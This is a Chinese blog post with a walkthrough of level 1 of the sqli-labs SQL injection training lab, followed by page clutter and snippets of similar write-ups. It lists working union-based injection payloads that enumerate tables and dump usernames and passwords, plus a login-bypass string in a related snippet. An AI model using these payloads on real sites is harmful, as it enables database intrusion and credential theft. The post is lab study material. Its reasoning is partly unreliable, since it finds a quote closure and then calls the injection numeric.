sqli-labs 通关笔记第一关

已于 2024-04-22 19:55:38 修改
阅读量346 收藏 5
点赞数 5
文章标签: 笔记
于 2024-04-22 19:54:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66169375/article/details/138088712
版权

打开第一关,提示,往id里传参

1,?id=\,报错,判断是用'闭合的

2,先判断是字符型还是数字型

用and1=1和and1=2来判断

url中输入id=x and 1=1  回显正常

url中输入id=x and 1=2 回显错误

说明为数字型注入

若为字符型

应为select*from <表名>where id='x and 1=2'

3,判断表字段数有几列数据 

/?id=1' order by 3 --+   回显正常

/?id=1' order by 4 --+   报错,说明只有三个字段

4,使用联合查询是否有显示位 union select 1,2,3

/?id=1' union select 1,2,3 --+   返回页面不变,

5,猜测有LIMIT语句控制显示内容

/?id=-1' union select 1,2,3 --+

返回显示页出来。为2,3可以显示内容

6,利用这一点获取数据库和数据表

/?id=-1' union select 1,database(),group_concat(table_name)from information_schema.tables where information_schema.tables.table_schema=database() --+

返回数据库为security,表名为emalls,referers,uagents,users

7,获取指定表字段

/?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users' --+

返回三个字段

8,获取指定表的数据,username,password

?id=-1' union select 1,2,group_concat(concat_ws('-',username,password))from users --+

另一个表一样的步骤

m0_66169375
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs系列——第一关
1匹黑马
04-26 3915
文章目录判断注入类型开始注入 判断注入类型 首先判断是什么类型的注入,这里是字符型的: 1' and '1'='1 //正常 1' and '1'='2 //错误 开始注入 末尾的注释符#被过滤,所以报错了: URL编码绕过,列长度为3: 爆注入点: 'union SELECT 1,2,3%23 爆表名: http://192.168.1.113:86/Less-1/?id='uni...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sql-labs(1-8关)
2302_80935968的博客
04-17 2178
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
sqli-labs通关详解(1-20关)
2302_81105681的博客
04-11 3163
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqllab第一关新手向解析
Deeeelete的博客
09-25 982
1来到URL以PHP文件为结尾的界面,直接在文件后斜线构造?id=1’来判断,并通过报错的相关内容来分析,已知我们报错的内容为”1”LIMIT 0,1’,我们输入的内容是1’,所以后面的内容是’LIMIT 0,1’ 2这里我们判断它的字段数,使用order by n(数字) 来猜测,在猜测到字段4的时候报错,说明其中会有三个字段,语句中的%23是注释,用来消除后面不需要的语句,常有的注释有# %2...
sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3958
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
phpstudy+靶场sqli-labs-master下载
11-08
Sqli-Labs是一个专门针对SQL注入进行实战训练的靶场,分为多个级别,每个级别设计了不同的漏洞场景,旨在帮助用户理解和掌握SQL注入的检测和防护方法。“sqli-labs-master.zip”文件则包含了这个靶场的源代码和相关...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqlilab第一关
qq_45491497的博客
07-28 1994
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
sqli-labs 1-5关
qq_41326328的博客
03-28 1207
这次写一个关于sql注入的闯关游戏,叫sqli-liabs,这个源码在网上搜索一下sqli-liabs源码下载,放到phpstudy环境里, 注意:这里把phpstudy版本调到5.5,别问我为什么,厂长是我的表哥 下面先说一下, 注入分为数字型注入和字符串型注入 区别: ?id=1 and 1=1 ?id=2 and 1=2 回显不一致则为数字型注入,回显一致的话再继续判断 ?di=1’ ...
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
哈希原理(笔记)
最新发布
m0_62024160的博客
08-17 815
尤其应该注意Hash function的设计,它是一个难点,Hash funtion设计好坏直接关乎哈希表查询速度的快慢。考虑到哈希碰撞(涉及到对链表的操作),所以最坏的时间复杂度都是O(n)。早期的md5被破解也是因为人们搞清楚了它的加密方法 f(1) )大多利用单向散列函数函数。(简称为f(2) )计算查询哈希碰撞确认某个哈希值的存在,但是无法通过 f(2)逆推出明文(因为 f(2)只是验证方法,而非解密方法)。(本图来源:wiki)这个签名是由文件的散列值通过发布者的私钥加密生成的。
经验笔记:URI、URL、URN与URC之间的区别
qq_45831414的博客
08-14 598
URI是一种通用的标识符,可以指代任何类型的资源。URL是一种特定类型的URI,它不仅标识资源,还提供了访问该资源的方法。URN是一种用于唯一命名资源的特殊URI类型。URC是一个概念性的术语,用于描述如何构建或创建资源的过程。通过理解这些概念的区别,我们可以更加清晰地识别和使用互联网资源的标识方式。在日常工作中,我们最常遇到的是URL,因为它们是我们访问网页和其他在线资源的基础;而URN则在需要持久引用资源的情况下使用。
C++_基本语法笔记_模板
qq_45629864的博客
08-14 410
思想是Java里的泛型(不确定用什么类型的数据)这里template这一句,意思是声明T是泛型,后面写用到泛型T的函数。建议都用应用场景:不同数据类型的交换函数。
8月13日学习笔记 LVS
weixin_70751701的博客
08-13 1137
目标地址散列调度算法先根据请求的目标IP地址,作为散列键 (Hash Key)从静态分配的散列表找出对应的服务器,若该服务器 是可用的且未超载,将请求发送到该服务器,否则返回空。1. 配置两个网卡和两个ip地址,正常来说应该配置两个不同的网段的 ip,一个对外的vip,一个对内的dip,现在主要使用nat的网络模 式,可以配置桥接模式对外,Nat对内,教师机不方便配置桥接模 式,所以都是配置的nat模式,但是一定要分清楚哪个ip是vip,哪个 ip是dip,在物理主机上都要能够ping通。
C++_基本语法笔记_继承和多态
qq_45629864的博客
08-13 565
思想与Java差不多。
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相关信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值